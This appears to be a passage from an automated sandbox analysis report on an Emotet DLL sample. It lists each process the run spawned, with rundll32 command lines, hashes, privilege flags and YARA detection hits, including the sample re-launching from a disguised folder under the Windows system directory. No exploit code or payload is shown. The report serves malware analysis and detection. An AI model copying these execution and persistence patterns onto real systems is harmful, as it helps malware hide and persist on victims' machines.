                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000003.522035243.0000000000785000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000005.00000002.534275093.0000000000860000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:00:43:11
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",#1
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.562932146.0000000000770000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.563477731.000000000091A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:00:43:16
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,ajkaibu
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.572742527.0000000000C30000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.574084916.0000000000C7A000.00000004.00000020.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:00:43:23
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe C:\Users\user\Desktop\efELSMI5R4.dll,akyncbgollmj
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.562952810.0000000000DFA000.00000004.00000020.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.562904188.0000000000C50000.00000040.00000010.sdmp, Author: Joe Security
                        Reputation:high

                        General

                        Start time:00:44:11
                        Start date:02/12/2021
                        Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                        Wow64 process (32bit):false
                        Commandline:"C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                        Imagebase:0x7ff6ee0f0000
                        File size:455656 bytes
                        MD5 hash:A267555174BFA53844371226F482B86B
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:44:11
                        Start date:02/12/2021
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff7f20f0000
                        File size:625664 bytes
                        MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                        Has elevated privileges:true
                        Has administrator privileges:false
                        Programmed in:C, C++ or other language
                        Reputation:high

                        General

                        Start time:00:45:01
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:02
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bbinmhqtvqxlwm\fxpdqqlt.pee",NbYKKsmYIJwkXu
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.661109523.00000000035A0000.00000040.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000000D.00000002.660358890.000000000331A000.00000004.00000020.sdmp, Author: Joe Security

                        General

                        Start time:00:45:19
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:19
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:20
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 168 -p 6404 -ip 6404
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:20
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\efELSMI5R4.dll",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:24
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:28
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 308
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:37
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 6404 -ip 6404
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:38
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6404 -s 316
                        Imagebase:0x1090000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:45:56
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        General

                        Start time:00:46:04
                        Start date:02/12/2021
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Bbinmhqtvqxlwm\fxpdqqlt.pee",Control_RunDLL
                        Imagebase:0x10a0000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000001A.00000002.813526904.00000000009A0000.00000040.00000010.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 0000001A.00000003.765865481.0000000000C4D000.00000004.00000001.sdmp, Author: Joe Security

                        General

                        Start time:00:46:09
                        Start date:02/12/2021
                        Path:C:\Windows\System32\svchost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                        Imagebase:0x7ff70d6e0000
                        File size:51288 bytes
                        MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language

                        Disassembly

                        Code Analysis